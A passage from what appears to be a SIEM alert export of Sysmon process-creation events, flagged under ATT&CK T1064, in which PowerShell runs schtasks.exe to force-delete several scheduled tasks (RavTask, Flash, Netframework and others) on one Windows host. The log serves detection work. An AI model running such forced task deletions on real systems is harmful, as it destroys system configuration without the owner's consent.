Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.741",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.403 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010d0f51900} +ProcessId: 7320 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.406695300Z"",""eventRecordID"":""2245"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.403\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010d0f51900}\r\nProcessId: 7320\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.403"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010d0f51900}"",""processId"":""7320"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.721",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.381 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001040f41900} 
+ProcessId: 7280 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.383453900Z"",""eventRecordID"":""2244"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.381\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001040f41900}\r\nProcessId: 7280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.381"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001040f41900}"",""processId"":""7280"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.707",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.355 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010b1f21900} +ProcessId: 4248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.359482400Z"",""eventRecordID"":""2243"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.355\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010b1f21900}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.355"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010b1f21900}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.678",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.329 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001021f11900} +ProcessId: 7224 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.332275900Z"",""eventRecordID"":""2242"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.329\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001021f11900}\r\nProcessId: 7224\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:37.329"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001021f11900}"",""processId"":""7224"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.306 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001054ef1900} +ProcessId: 7172 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.308373800Z"",""eventRecordID"":""2241"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.306\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001054ef1900}\r\nProcessId: 7172\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.306"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001054ef1900}"",""processId"":""7172"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.604",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.283 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c5ed1900} +ProcessId: 6460 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.286492800Z"",""eventRecordID"":""2240"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.283\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c5ed1900}\r\nProcessId: 6460\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.283"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010c5ed1900}"",""processId"":""6460"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 